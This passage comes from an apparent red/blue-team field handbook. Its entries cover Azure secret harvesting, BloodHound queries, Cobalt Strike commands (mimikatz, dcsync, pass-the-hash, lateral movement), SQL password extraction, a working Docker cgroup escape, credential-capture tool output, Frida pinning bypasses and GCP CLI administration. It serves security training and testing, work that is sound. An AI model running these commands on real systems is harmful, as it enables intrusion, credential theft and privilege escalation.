Get-RoleMembers role Reader
Returns all service
Get-Sps principals Reader
Returns all info on a
specified service
Get-Sp principal Reader
Gets all applications and
Get-Apps their Ids Reader
Returns the permissions
Get-AppPermissions of an app Reader
Get-WebApps Gets running web apps Reader
Gets running webapps
Get-WebAppDetails details Reader
SECRET GATHER
Get-KeyVaults Lists the Key Vaults Reader
Get the secrets from a
Get-KeyVaultContents specific Key Vault Contributor
Gets ALL the secrets from
Get-AllKeyVaultContents all Key Vaults. Contributor
Returns the application
passwords or certificate
Get-AppSecrets credentials Contributor
Returns all application
passwords or certificate
credentials (If
Get-AllAppSecrets accessible) Contributor
Gets ALL the secrets from
all Key Vaults and
Get-AllSecrets applications. Contributor
Get- Gets the credentials from
AutomationCredentials any Automation Accounts Contributor
DATA EXFIL
Get-StorageAccounts Gets all storage accounts Reader
Gets the account keys for
Get-StorageAccountKeys a storage account Contributor
Gets the contents of a
storage container or file
Get-StorageContents share Reader
Get-Runbooks Lists all the Runbooks Reader

47
 Reads content of a
Get-RunbookContent specific Runbook Reader
Lists the VM disks
Get-AvailableVMDisks available. Reader
Generates a link to
download a Virtual
Machine's disk. The link
is only available for an
Get-VMDisk hour. Contributor
Get-VMs Lists available VMs Reader

REFERENCE:
[Link]
[Link]
[Link]
security
[Link]
powerzure-ca70b330511a
[Link]
[Link]
[Link]

A A
AZURE_Hardening
BLUE TEAM CONFIGURATION CLOUD

Best Practice Rules for Azure

[Link]

A A
AZURE_Terms
RED/BLUE TEAM RECON/ADMIN CLOUD

Azure Terms Cheat Sheets

[Link]
terminology
[Link]

A A
AZURE_Tricks
RED/BLUE TEAM RECON/ADMIN CLOUD

48
Azure Tips & Tricks Blog
[Link]
[Link]

B
B B
BLOODHOUND
RED/BLUE TEAM RECON WINDOWS
BloodHound uses graph theory to reveal the hidden and often
unintended relationships within an Active Directory environment.
Attackers can use BloodHound to easily identify highly complex
attack paths that would otherwise be impossible to quickly
identify. Defenders can use BloodHound to identify and eliminate
those same attack paths.

BLOODHOUND CYPHER QUERIES

List all owned users
MATCH (m:User) WHERE [Link]=TRUE RETURN m
List all owned computers
MATCH (m:Computer) WHERE [Link]=TRUE RETURN m
List all owned groups
MATCH (m:Group) WHERE [Link]=TRUE RETURN m
List all High Valued Targets
MATCH (m) WHERE [Link]=TRUE RETURN m
List the groups of all owned users

49
MATCH (m:User) WHERE [Link]=TRUE WITH m MATCH p=(m)-
[:MemberOf*1..]->(n:Group) RETURN p
Find all Kerberoastable Users
MATCH (n:User)WHERE [Link]=true RETURN n
Find All Users with an SPN/Find all Kerberoastable Users with
passwords last set less than 5 years ago
MATCH (u:User) WHERE [Link]=true AND [Link] <
(datetime().epochseconds - (1825 * 86400)) AND NOT [Link] IN
[-1.0, 0.0] RETURN [Link], [Link] order by [Link]
Find Kerberoastable Users with a path to DA
MATCH (u:User {hasspn:true}) MATCH (g:Group) WHERE [Link] ENDS
WITH '-512' MATCH p = shortestPath( (u)-[*1..]->(g) ) RETURN p
Find machines Domain Users can RDP into
match p=(g:Group)-[:CanRDP]->(c:Computer) where [Link] ENDS
WITH '-513' return p
Find what groups can RDP
MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN p
Find groups that can reset passwords (Warning: Heavy)
MATCH p=(m:Group)-[r:ForceChangePassword]->(n:User) RETURN p
Find groups that have local admin rights (Warning: Heavy)
MATCH p=(m:Group)-[r:AdminTo]->(n:Computer) RETURN p
Find all users that have local admin rights
MATCH p=(m:User)-[r:AdminTo]->(n:Computer) RETURN p
Find all active Domain Admin sessions
MATCH (n:User)-[:MemberOf]->(g:Group) WHERE [Link] ENDS WITH '-
512' MATCH p = (c:Computer)-[:HasSession]->(n) return p
Find all computers with Unconstrained Delegation
MATCH (c:Computer {unconstraineddelegation:true}) return c
Find all computers with unsupported operating systems
MATCH (H:Computer) WHERE [Link] =~
'.*(2000|2003|2008|xp|vista|7|me)*.' RETURN H
Find users that logged in within the last 90 days
MATCH (u:User) WHERE [Link] < (datetime().epochseconds - (90 *
86400)) and NOT [Link] IN [-1.0, 0.0] RETURN u
Find users with passwords last set within the last 90 days
MATCH (u:User) WHERE [Link] < (datetime().epochseconds - (90
* 86400)) and NOT [Link] IN [-1.0, 0.0] RETURN u
Find constrained delegation
MATCH p=(u:User)-[:AllowedToDelegate]->(c:Computer) RETURN p
Find computers that allow unconstrained delegation that AREN’T
domain controllers.
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE [Link]
ENDS WITH '-516' WITH COLLECT([Link]) AS domainControllers MATCH
(c2:Computer {unconstraineddelegation:true}) WHERE NOT [Link] IN
domainControllers RETURN c2

50
Return the name of every computer in the database where at least
one SPN for the computer contains the string 'MSSQL'
MATCH (c:Computer) WHERE ANY (x IN [Link] WHERE
toUpper(x) CONTAINS 'MSSQL') RETURN c
View all GPOs
Match (n:GPO) RETURN n
View all groups that contain the word 'admin'
Match (n:Group) WHERE [Link] CONTAINS 'ADMIN' RETURN n
Find users that can be AS-REP roasted
MATCH (u:User {dontreqpreauth: true}) RETURN u
Find All Users with an SPN/Find all Kerberoastable Users with
passwords last set > 5 years ago
MATCH (u:User) WHERE [Link]=true AND WHERE [Link] <
(datetime().epochseconds - (1825 * 86400)) and NOT [Link] IN
[-1.0, 0.0] RETURN u
Show all high value target's groups
MATCH p=(n:User)-[r:MemberOf*1..]->(m:Group {highvalue:true})
RETURN p
Find groups that contain both users and computers
MATCH (c:Computer)-[r:MemberOf*1..]->(groupsWithComps:Group) WITH
groupsWithComps MATCH (u:User)-[r:MemberOf*1..]->(groupsWithComps)
RETURN DISTINCT(groupsWithComps) as groupsWithCompsAndUsers
Find Kerberoastable users who are members of high value groups
MATCH (u:User)-[r:MemberOf*1..]->(g:Group) WHERE [Link]=true
AND [Link]=true RETURN u
Find Kerberoastable users and where they are AdminTo
OPTIONAL MATCH (u1:User) WHERE [Link]=true OPTIONAL MATCH (u1)-
[r:AdminTo]->(c:Computer) RETURN u
Find computers with constrained delegation permissions and the
corresponding targets where they allowed to delegate
MATCH (c:Computer) WHERE [Link] IS NOT NULL RETURN c
Find if any domain user has interesting permissions against a GPO
(Warning: Heavy)
MATCH p=(u:User)-
[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOw
ner|GpLink*1..]->(g:GPO) RETURN p
Find if unprivileged users have rights to add members into groups
MATCH (n:User {admincount:False}) MATCH p=allShortestPaths((n)-
[r:AddMember*1..]->(m:Group)) RETURN p
Find all users a part of the VPN group
Match p=(u:User)-[:MemberOf]->(g:Group) WHERE toUPPER ([Link])
CONTAINS 'VPN' return p
Find users that have never logged on and account is still active
MATCH (n:User) WHERE [Link]=-1.0 AND [Link]=TRUE
RETURN n

51
Find an object in one domain that can do something to a foreign
object
MATCH p=(n)-[r]->(m) WHERE NOT [Link] = [Link] RETURN p
Find all sessions a user in a specific domain has
MATCH p=(m:Computer)-[r:HasSession]->(n:User {domain:{result}})
RETURN p

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]

C
C C
COBALT STRIKE
RED TEAM C2 WINDOWS
Cobalt Strike is software for Adversary Simulations and Red Team
Operations.

COMMAND DESCRIPTION
BASIC
Cancel a download currently
in progress, wildcards
cancel [*file*] accepted.
Change into the specified
cd [directory] working directory.
clear Clear all current taskings.

52
cp [src] [dest] File copy
Download a file from the path
download [C:\filePath] on the Beacon host.
downloads Lists downloads in progress
un a local .NET executable as
a Beacon post-exploitation
execute-assembly job as your current token
exit Task the Beacon to exit.
Display all available
commands or the help for a
help <cmd> specified command
Inject a new Beacon into the
inject [pid] <x86|x64> specified process
jobkill [job ID] Kill the specified job ID.
jobs List the running jobs.
injects a keystroke logger
into the given process ID and
keylogger [pid] <x86|x64> architecture
Link/unlink to/from a remote
link/unlink [IP address] Beacon.
List the files on the
specified path or the current
ls <C:\Path> folder.
Beacon net commands
net implemented that don’t rely
[session/share/localgroup/etc] on [Link]
ps Show a process listing
Display the current working
directory for the Beacon
pwd session.
reg_query [x86|x64] query a specific key in the
[HIVE\path\to\key] registry
reg_query [x86|x64] uery a specific value within
[HIVE\path\to\key] [value] a registry key
rm [file\folder] Delete a file\folder.
injects a screen capture stub
into the specified
screenshot [pid] <x86|x64> process/architecture for the
[runtime in seconds] specified number of seconds.
setenv set an environment variable
Execute a shell command using
shell [cmd] [arguments] [Link]
Set the Beacon to sleep for
the number of seconds and the
associated 0-99% jitter. 0
sleep [seconds] <jitter/0-99> means interactive.
Upload a file from the
upload [/path/to/file] attacker machine to the

53
 current Beacon working
directory
SPOOFING
add a command to the fake
argue [command] [fake arguments] arugments internal list
ppid <ID> set the parent process ID
spawnto <x86/x64>
<C:\process\to\[Link]> set the child process spawned
MIMIKATZ
format to execute a
Mimikatz !module:: elevate to
SYSTEM; @module:: force usage
mimikatz [module::command] <args> of current token.
will execute the
sekurlsa::logonpasswords
module which extracts hashes
and plaintext passwords out
logonpasswords of LSASS
will use lsadump::dcync to
extract the hash for the
dcsync [[Link]] specified user from a domain
[DOMAIN\user] controller
will use sekurlsa::pth to
inject a user’s hash into
LSASS;requires local admin
pth [DOMAIN\user] [NTLM hash] privileges.
DESKTOP VNC
stage a VNC server into the
memory of the current process
desktop <pid> <x86|x64> and tunnel the connection
<low|high> through Beacon
POWERSHELL
import a PowerShell .ps1
script from the control
powershell-import server and save it in memory
[/path/to/script.ps1] in Beacon
setup a local TCP server
bound to localhost and
download the script; function
and any arguments are
powershell [commandlet] executed and output is
[arguments] returned.
launch the given function
using @tifkin_’s Unmanaged
powerpick [commandlet] PowerShell, which doesn’t
[arguments] start [Link]
inject Unmanaged PowerShell
psinject [pid] [arch] into a specific process and
[commandlet] [arguments] execute the specified command

54
SESSION PASSING
inject a Reflective DLL into
dllinject [pid] a process.
Inject a new Beacon into the
inject [pid] <x86|x64> specified process
inject shellcode, from a
shinject [pid] <x86|x64> local file,into a process on
[/path/to/[Link]] target
Spawn a new Beacon process to
spawn [x86|x64] [listener] the given listener.
Spawn a new Beacon to the
spawnas [DOMAIN\user] [password] specified listener as another
[listener] user.
dllload [pid] load an on-disk DLL in
[c:\path\to\[Link]] another process.
PRVILEGE ESCALATION
list privilege escalation
exploits registered with
elevate Cobalt Strike.
attempt to elevate with a
elevate [exploit] [listener] specific exploit.
ist command elevator exploits
registered with Cobalt
runasadmin Strike.
attempt to run the specified
runasadmin [exploit] [command + command in an elevated
args] context
runas[DOMAIN\user] [password] run a command as another user
[command] using their credentials.
spawnas [DOMAIN\user] [password] spawn a session as another
[listener] user using their credentials.
impersonate a token for the
getsystem SYSTEM account.
Get SYSTEM is to create a
elevate svc-exe [listener] service that runs a payload.
enable the privileges
assigned to your current
getprivs access token.
RECON
portscan [targets] [ports] start the port scanner job
Uses an ARPrequestto discover
portscan [targets] arp if a host isalive
sends an ICMP echo request to
portscan [targets] icmp check if a target is alive.
find the domain controller
for the domain the target is
net dclist joined to
find targets on the domain
net view the target is joined to

55
 findstargets by querying
computer account groups on a
net computers Domain Controller.
list the groups on another
net localgroup \\TARGET system.
net localgroup \\TARGET group list the members of a group
name on another system
TOKENS
impersonate a token from an
steal_token [process id] existing process
make_token [DOMAIN\user] generate a token that passes
[password] these credentials
getuid print your current token.
revert back to your original
rev2self token.
TICKETS
kerberos_ticket_use inject a Kerberos ticket into
[/path/to/[Link]] the current session.
clear any kerberos
ticketsassociated with your
kerberos_ticket_purge session.
LATERAL MOVEMENT
list lateral movement options
registered with Cobalt
jump Strike.
attempt to run a payload on a
jump [module] [target] [listener] remote target.
Use a service to run a
jump psexec [target] [listener] Service EXE artifact
Use a service to run a
jump psexec64 [target] [listener] Service EXE artifact
jump psexec_psh [target] Use a service to run a
[listener] PowerShell one-liner
Run a PowerShell script via
jump winrm [target] [listener] WinRM
Run a PowerShell script via
jump winrm64 [target] [listener] WinRM
list remote execution modules
registered with Cobalt
remote-exec Strike.
remote-exec [module] [target] attempt to run the specified
[command + args] command on a remote target.
remote-exec psexec [target] Remote execute via Service
[command + args] Control Manager
remote-exec winrm [target] Remote execute via WinRM
[command + args] (PowerShell)
remote-exec wmi [target] [command Remote execute via WMI
+ args] (PowerShell)
PIVOTING

56
 start a SOCKS server on the
given port on your
teamserver, tunneling traffic
socks [PORT] through the specified Beacon.
disable the SOCKS proxy
socks stop server.
proxy browser traffic through
a specified Internet Explorer
browserpivot [pid] <x86|x64> process.
bind to the specified port on
the Beacon host, and forward
rportfwd [bind port] [forward any incoming connections to
host] [forward port] the forwarded host and port.
disable the reverse port
rportfwd stop [bind port] forward.
SSH SESSIONS
Launch an SSH session from a
ssh [target] [user] [password] Beacon on Unix targets
ssh-key [target] [user] Launch an SSH session from a
[/path/to/[Link]] Beacon on Unix targets
run the command and arguments
shell [cmd + arguments] you provide.
attempt to run a command via
sudo [password] [cmd + arguments] sudo.

INTEGRATIONS/ENHANCEMENTS
The Elevate Kit
An Aggressor Script that integrates several open source privilege
escalation exploits into Cobalt Strike.
[Link]

REFERENCE:
[Link]
[Link]
[Link]
[Link]
%20and%20Resources/Cobalt%20Strike%20-%[Link]

C C
CYBER CHEF
BLUE TEAM FORENSICS ALL
CyberChef is a simple, intuitive web app for analyzing and decoding
data without having to deal with complex tools or programming
languages.

57
Example Scenarios:
o Decode a Base64-encoded string
o Convert a date and time to a different time zone
o Parse a IPv6 address
o Convert data from a hexdump, then decompress
o Decrypt and disassemble shellcode
o Display multiple timestamps as full dates
o Carry out different operations on data of different types
o Use parts of the input as arguments to operations
o Perform AES decryption, extracting the IV from the
beginning of the cipher stream
o Automatically detect several layers of nested encoding

DESCRIPTION (Win/Linux) (Mac)

Place cursor in
search field Ctrl+Alt+f Ctrl+Opt+f
Place cursor in input
box Ctrl+Alt+i Ctrl+Opt+i
Place cursor in
output box Ctrl+Alt+o Ctrl+Opt+o
Place cursor in first
argument field of the
next operation in the
recipe Ctrl+Alt+. Ctrl+Opt+.
Place cursor in first
argument field of the
nth operation in the
recipe Ctrl+Alt+[1-9] Ctrl+Opt+[1-9]
Disable current
operation Ctrl+Alt+d Ctrl+Opt+d
Set/clear breakpoint Ctrl+Alt+b Ctrl+Opt+b
Bake Ctrl+Alt+Space Ctrl+Opt+Space
Step Ctrl+Alt+' Ctrl+Opt+'
Clear recipe Ctrl+Alt+c Ctrl+Opt+c
Save to file Ctrl+Alt+s Ctrl+Opt+s
Load recipe Ctrl+Alt+l Ctrl+Opt+l
Move output to input Ctrl+Alt+m Ctrl+Opt+m
Create a new tab Ctrl+Alt+t Ctrl+Opt+t
Close the current tab Ctrl+Alt+w Ctrl+Opt+w
Ctrl+Alt+RightAr Ctrl+Opt+RightAr
Go to next tab row row
Ctrl+Alt+LeftArr Ctrl+Opt+LeftArr
Go to previous tab ow ow

REFERENCE:

58
[Link]

D
D D
DATABASES
RED/BLUE TEAM ADMINISTRATION WINDOWS/LINUX

MSSQL MySQL
DESCRIPTION
Version SELECT @@version; SELECT @@version;
Current DB
Name SELECT DB_NAME(); SELECT database();
SELECT name FROM SELECT user FROM
List users master..syslogins; [Link];
SELECT name FROM SELECT distinct(db) FROM
List DB's master..sysdatabases; [Link];
SELECT table_catalog,
column_name FROM
List information_schema.colum SHOW columns FROM
Columns ns; mytable FROM mydb;
SELECT table_catalog,
table_name FROM
information_schema.colum
List Tables ns; SHOW tables FROM mydb;
SELECT User,Password
SELECT
Extract FROM [Link] INTO
[Link],SL.password_hash
Passwords OUTFILE ‘/tmp/[Link]';

59
 FROM sys.sql_logins AS
SL;
ORACLE POSTGRES
SELECT user FROM dual
UNION SELECT * FROM
Version v$version SELECT version();
Current DB SELECT global_name FROM SELECT
Name global_name; current_database();
SELECT username FROM
all_users ORDER BY SELECT username FROM
List users username; pg_user;
SELECT DISTINCT owner SELECT datname FROM
List DB's FROM all_tables; pg_database;
SELECT column_name FROM
SELECT column_name FROM information_schema.colum
List all_tab_columns WHERE ns WHERE
Columns table_name = 'mydb'; table_name='data_table';
SELECT table_name FROM
SELECT table_name FROM information_schema.table
List Tables all_tables; s;
SELECT name, password,
spare4 FROM SELECT username, passwd
Extract [Link]$ WHERE FROM pg_shadow;
Passwords name='<username>';

REFERENCE:
[Link]
tion
[Link]
[Link]

D D
DEFAULT PASSWORDS
RED TEAM ESCALATE PRIVS ALL

REFER TO REFERENCES BELOW

REFERENCE
[Link]
[Link]
Credentials/[Link]
[Link]
[Link]

D D

60
 DOCKER
RED/BLUE TEAM DEVOPS WINDOWS/LINUX/MacOS

COMMAND DESCRIPTION
CONTAINER BASICS
docker run -p 4000:80 imgname Start docker container
Start docker container
docker run -d -p 4000:80 imgname in detached mode
docker run -t -d --entrypoint=/bin/sh Start container with
"$docker_image" entrypoint changed
Enter a running
docker exec -it <container-id> sh container
docker cp /tmp/[Link] Upload local file to
mycontainer:/[Link] container filesystem
docker cp mycontainer:/[Link] Download container
/tmp/[Link] file local filesystem
docker stop <hash> Stop container
docker rm <hash> Remove container
docker rm $(docker ps -a -q) Remove all containers
Force shutdown of one
docker kill <hash> given container
docker login Login to docker hub
docker tag <image> username/repo:tag Tag <image>
Docker push a tagged
docker push username/repo:tag image to repo
Run image from a given
docker run username/repo:tag tag
docker build -t denny/image:test . Create docker image
DOCKER CLEANUP
[Link] Delete all containers
Remove unused docker
[Link] images
docker image prune -f Docker prune images
docker volume prune -f Docker prune volumes
Remove the specified
docker rmi <imagename> image
Remove all docker
docker rmi $(docker images -q) images
docker volume rm $(docker volume ls -qf Remove orphaned docker
dangling=true) volumes
docker rm $(docker ps --filter
status=dead -qa) Remove dead containers
docker rm $(docker ps --filter Remove exited
status=exited -qa) containers
DOCKERFILE
Change entrypoint to
entrypoint: ["tail", "-f", "/dev/null"] run nothing

61
RUN ln -snf /usr/share/zoneinfo/$TZ
/etc/localtime && echo $TZ > Set timezone in
/etc/timezone Dockerfile
Define multiple line
GitHub: Dockerfile-example-multiline command
DOCKER COMPOSE
restart: always, Link: Compose file
version 3 reference Change restart policy
$PWD/httpd/[Link]:/usr/local/apache2
/conf/[Link]:ro GitHub: sample-
[Link] Mount file as volume
docker-compose up, docker-compose up -d Start compose env
docker-compose down, docker-compose down
-v Stop compose env
docker-compose logs Check logs
DOCKER CONTAINERS
docker run -p 4000:80 imgname Start docker container
Start docker container
docker run -d -p 4000:80 imgname in detached mode
Start docker container
docker run -rm -it imgname sh and remove when exit
Enter a running
docker exec -it [container-id] sh container
docker stop <hash> Stop container
docker ps, docker ps -a List all containers
docker rm <hash>, docker rm $(docker ps
-a -q) Remove container
Force shutdown of one
docker kill <hash> given container
docker login Login to docker hub
Run image from a given
docker run username/repo:tag tag
docker logs --tail 5 $container_name Tail container logs
docker inspect --format Check container
'{{.[Link]}}' $container_name healthcheck status
docker ps --filter "label=[Link]- List containers by
[Link]" labels
DOCKER IMAGES
docker images, docker images -a List all images
docker build -t denny/image:<tag> . Create docker image
Docker push a tagged
docker push denny/image:<tag> image to repo
Show the history of an
docker history <image_name> image
docker save <image_name> > my_img.tar Export image to file
Load image to local
docker load -i my_img.tar registry
docker tag <image> username/repo:tag Tag <image>

62
 DOCKER SOCKETFILE
docker run -v
/var/run/[Link]:/var/run/[Link] Run container mounting
k -it alpine sh socket file
export A different docker
DOCKER_HOST=unix:///my/[Link] socket file
curl -XGET --unix-socket
/var/run/[Link]
[Link] List containers
curl -XPOST --unix-socket
/var/run/[Link]
[Link]
d>/stop Stop container
curl -XPOST --unix-socket
/var/run/[Link]
[Link]
d>/start Start container
curl --unix-socket /var/run/[Link]
[Link] List events
curl -XPOST --unix-socket
/var/run/[Link] -d
'{"Image":"nginx:alpine"}' -H 'Content-
Type: application/json'
[Link] Create container
DOCKER CONF
/var/lib/docker,
/var/lib/docker/devicemapper/mnt Docker files
~/Library/Containers/[Link]/D
ata/ Docker for Mac
DOCKER STATUS
docker logs --tail 5 $container_name Tail container logs
docker inspect --format Check container
'{{.[Link]}}' $container_name healthcheck status
docker ps List containers
docker ps -a List all containers
docker ps --filter "label=[Link]- List containers by
[Link]" labels
docker images -a List all images

REFERENCE:
[Link]
100-article/62_article/Docker%20for%[Link]
[Link]
[Link]
[Link]

D D
DOCKER_Exploit

63
 RED TEAM EXPLOITATION WINDOWS/LINUX

Docker Secrets Locations

If you gain access to a Docker container you can check the
following location for possible plaintext or encoded Docker
passwords, api_tokens, etc. that the container is using for
external services.

You may be able to see Docker secret locations or names by issuing:

$ docker secret ls

Depending on the OS your target Docker container is running you can

check the following locations for secret file locations or mounts.
Linux Docker Secrets Locations:
/run/secrets/<secret_name>

Windows Docker Secrets Locations:

C:\ProgramData\Docker\internal\secrets
C:\ProgramData\Docker\secrets

Container Escape Abuse Linux cgroup v1:

# version of the PoC that launches ps on the host
# spawn a new container to exploit via
# docker run --rm -it --privileged ubuntu bash
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh\nps
>'"$t/o" >/c;
chmod +x /c;sh -c "echo 0 >$d/w/[Link]";sleep 1;cat /o
Exploit Refined will execute a ps aux command on the host and save
its output to the /output file in the container:
# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt
apparmor=unconfined ubuntu bash
# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp &&
mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd

echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/[Link]"

64
REFERENCE:
[Link]
escapes/

F
F F
FLAMINGO
RED TEAM ESCALATE PRIV WINDOWS/LINUX
Flamingo captures credentials sprayed across the network by various
IT and security products. Currently supports SSH, HTTP, LDAP, DNS,
FTP, and SNMP credential collection.

Flamingo binary from the releases page or build from source.

$ GOOS=win32 GOARCH=amd64 go build -o [Link]

$ go get -u -v [Link]/atredispartners/flamingo && \

go install -v [Link]/atredispartners/flamingo && \
$GOPATH/bin/flamingo

Run the binary and collect credentials

C:\> [Link]

{"_etime":"2020-01-
10T[Link]Z","_host":"[Link]:18301","_proto":"ssh","method":"pubk
ey","pubkey":"ssh-ed25519
AAAAC3NzaC1lZDI1NTE5AAAAIPVSxqrWfNle0nnJrKS3NA12uhu9PHxnP4OlD843tRz

65
/","pubkey-
sha256":"SHA256:/7UkXjk0XtBe9N6RrAGGgJTGuKKi1Hgk3E+4TPo54Cw","usern
ame":"devuser","version":"SSH-2.0-OpenSSH_for_Windows_7.7"}

{"_etime":"2020-01-
10T[Link]Z","_host":"[Link]:1361","_proto":"ssh","method":"passw
ord","password":"SuperS3kr3t^!","username":"root","version":"SSH-
2.0-OpenSSH_for_Windows_7.7"}

{"_etime":"2020-01-
10T[Link]Z","_host":"[Link]:9992","_proto":"ssh","method":"passw
ord","password":"DefaultPotato","username":"vulnscan-
a","version":"SSH-2.0-OpenSSH_for_Windows_7.7"}

**Default log credentials to standard output & append to

[Link] in working directory.

Options
--protocols to configure a list of enabled protocol listeners
Use additional options to specify ports and protocol options for
listeners.
All additional command-line arguments are output destinations.

Outputs
Flamingo can write recorded credentials to a variety of output
formats. By default, flamingo will log to [Link] and standard
output.

Standard Output
Specifying - or stdout will result in flamingo only logging to
standard output.

File Destinations
Specifying one or more file paths will result in flamingo appending
to these files.

HTTP Destinations
Specifying HTTP or HTTPS URLs will result in flamingo sending a
webhook POST request to each endpoint. By default, this format
supports platforms like Slack and Mattermost that support inbound
webhooks.
The actual HTTP POST looks like:

POST /specified-url
Content-Type: application/json
User-Agent: flamingo/v0.0.0

{"text": "full-json-output of credential report"}

Syslog Destinations

66
Specifying syslog or syslog:<parameters> will result in flamingo
sending credentials to a syslog server.
The following formats are supported:
• syslog - send to the default syslog output, typically a
unix socket
• syslog:unix:/dev/log - send to a specific unix stream
socket
• syslog:host - send to the specified host using udp and port
514
• syslog:host:port - send to the specified host using udp and
the specified port
• syslog:udp:host - send to the specified host using udp and
port 514
• syslog:udp:host:port - send to the specified host using udp
and the specified port
• syslog:tcp:host - send to the specified host using tcp and
port 514
• syslog:tcp:host:port - send to the specified host using tcp
and the specified port
• syslog:tcp+tls:host - send to the specified host using tls
over tcp and port 514
• syslog:tcp+tls:host:port - send to the specified host using
tls over tcp and the specified port

REFERENCE:
[Link]
[Link]
[Link]

F F
FRIDA
RED TEAM VULNERABILITY ALL
Frida is a dynamic code instrumentation toolkit. Lets you inject
snippets of JavaScript or your own library into native apps on
Windows, macOS, GNU/Linux, iOS, Android, QNX.

Listing frida available devices

frida-ls-devices

Getting frida server running on device

download latest binary from frida releases
adb shell "su -c 'chmod 755 /data/local/tmp/frida-server'"
adb shell "su -c '/data/local/tmp/frida-server' &"

Trace open calls in chrome

67
frida-trace -U -i open [Link]

FRIDA-CLI
Connect to application and start debugging
frida -U <APP NAME>

Loading a script
frida Calculator -l [Link]
#add --debug for more debugging symbols

Connect and list running processes

frida-ps -U

Connect and list running applications

frida-ps -Ua

Connect and list installed applications

frida-ps -Uai

Connect to specific device

frida-ps -D 0216027d1d6d3a03

If/when troubleshooting brida to frida bridge

frida -U -f [Link] -l ~/bin/proxies/[Link] --
no-pause
NOTE: Turn off magisk hiding in settings as this causes issue with
brida and frida link.

iOS
NOTE: For non-jailbroken iPhones, frida gadget technique is way to
go. Recompile app with embedded frida gadget

iOS getting list of applications

#run this on the device
ipainstaller -l > [Link]

Get active window

w = [Link]()
#This returns an address such as: 0xd43321
#Now drill into this window with:
desc = [Link]().toString()

Refactor into one-liner:

frida -q -U evilapp -e
"[Link]().recursiveDescription()

68
.toString;" | grep "UILabel.*hidden*""

FRIDA SCRIPTS
SSL pinning bypass (android - via frida codeshare)
frida --codeshare pcipolloni/universal-android-ssl-pinning-bypass-
with-frida -f YOUR_BINARY

frida --codeshare segura2010/android-certificate-pinning-bypass -f

YOUR_BINARY

frida --codeshare sowdust/universal-android-ssl-pinning-bypass-2 -f

YOUR_BINARY

Anti-root bypass (android - via frida codeshare)

frida --codeshare dzonerzy/fridantiroot -f YOUR_BINARY

Obj-C method observer

frida --codeshare mrmacete/objc-method-observer -f YOUR_BINARY

Get stack trace in your hook (android)

frida --codeshare razaina/get-a-stack-trace-in-your-hook -f
YOUR_BINARY

Bypass network security config (android)

frida --codeshare tiiime/android-network-security-config-bypass -f
YOUR_BINARY

Extract android keystore

frida --codeshare ceres-c/extract-keystore -f YOUR_BINARY

iOS backtrace http requests

frida --codeshare SYM01/ios-backtrace-http-req -f YOUR_BINARY

iOS trustkit SSL unpinning

frida --codeshare platix/ios-trustkit-ssl-unpinning -f YOUR_BINARY

iOS SSL bypass

frida --codeshare lichao890427/ios-ssl-bypass -f YOUR_BINARY

iOS 12 SSL bypass

frida --codeshare machoreverser/ios12-ssl-bypass -f YOUR_BINARY

iOS SSL pinning disable

frida --codeshare snooze6/ios-pinning-disable -f YOUR_BINARY

iOS & Android enumeration script

69
frida --codeshare snooze6/everything -f YOUR_BINARY

REFERENCE:
Twitter> @gh0s7
[Link]
[Link]
[Link]

G
G G
GCP CLI
ALL ADMINISTRATION CLOUD
gcloud CLI manages authentication, local configuration, developer
workflow, and interactions with Google Cloud APIs.

COMMAND DESCRIPTION
BASICS
[Link] gcloud Doc
gsutil
[Link] Installation
[Link] Installation
Check version
gcloud version, gcloud info, gcloud components list & settings
gcloud init
#This will ask you to open an OpenID URL Init profile
List all
gcloud compute zones list zones
gcloud components update, gcloud components update - Upgrade local
-version 219.0.1 SDK
BUCKET BASICS

70
 List all
buckets and
gsutil ls, gsutil ls -lh gs://<bucket-name> files
gsutil cp gs://<bucket-name>/<dir-path>/package-
[Link] . Download file
gsutil cp <filename> gs://<bucket-name>/<directory>/ Upload file
gsutil cat gs://<bucket-name>/<filepath>/ Cat file
gsutil rm gs://<bucket-name>/<filepath> Delete file
gsutil mv <src-filepath> gs://<bucket-
name>/<directory>/<dest-filepath> Move file
gsutil cp -r ./conf gs://<bucket-name>/ Copy folder
Show disk
gsutil du -h gs://<bucket-name/<directory> usage
gsutil mb gs://<bucket-name> Create bucket
gsha1sum [Link], shasum syslog- Caculate file
[Link] sha1sum
gsutil help, gsutil help cp, gsutil help options Gsutil help
GCP PROJECT
gcloud config list, gcloud config list project List projects
Show project
gcloud compute project-info describe info
Switch
gcloud config set project <project-id> project
GKE
Display a
list of
credentialed
gcloud auth list accounts
Set the
active
gcloud config set account <ACCOUNT> account
gcloud container clusters get-credentials <cluster- Set kubectl
name> context
gcloud config set compute/region us-west Change region
gcloud config set compute/zone us-west1-b Change zone
List all
container
gcloud container clusters list clusters
IAM
gcloud auth activate-service-account --key-file Authenticate
<key-file> client
Display a
list of
credentialed
gcloud auth list accounts
Set the
active
gcloud config set account <ACCOUNT> account

71
 Auth to GCP
Container
gcloud auth configure-docker Registry
Print token
gcloud auth print-access-token, gcloud auth print- for active
refresh-token account
Revoke
previous
generated
gcloud auth <application-default> revoke credential
BUCKET SECRURITY
Make all
gsutil -m acl set -R -a public-read gs://<bucket- files
name>/ readable
gsutil config -a Config auth
gsutil iam ch
user:denny@[Link]:objectCreator,objectViewer Grant bucket
gs://<bucket-name> access
gsutil iam ch -d
user:denny@[Link]:objectCreator,objectViewer Remove bucket
gs://<bucket-name> access
INSTANCE
gcloud compute instances list, gcloud compute List all
instance-templates list instances
gcloud compute instances describe "<instance-name>" Show instance
--project "<project-name>" --zone "us-west2-a" info
Stop an
gcloud compute instances stop instance-2 instance
Start an
gcloud compute instances start instance-2 instance
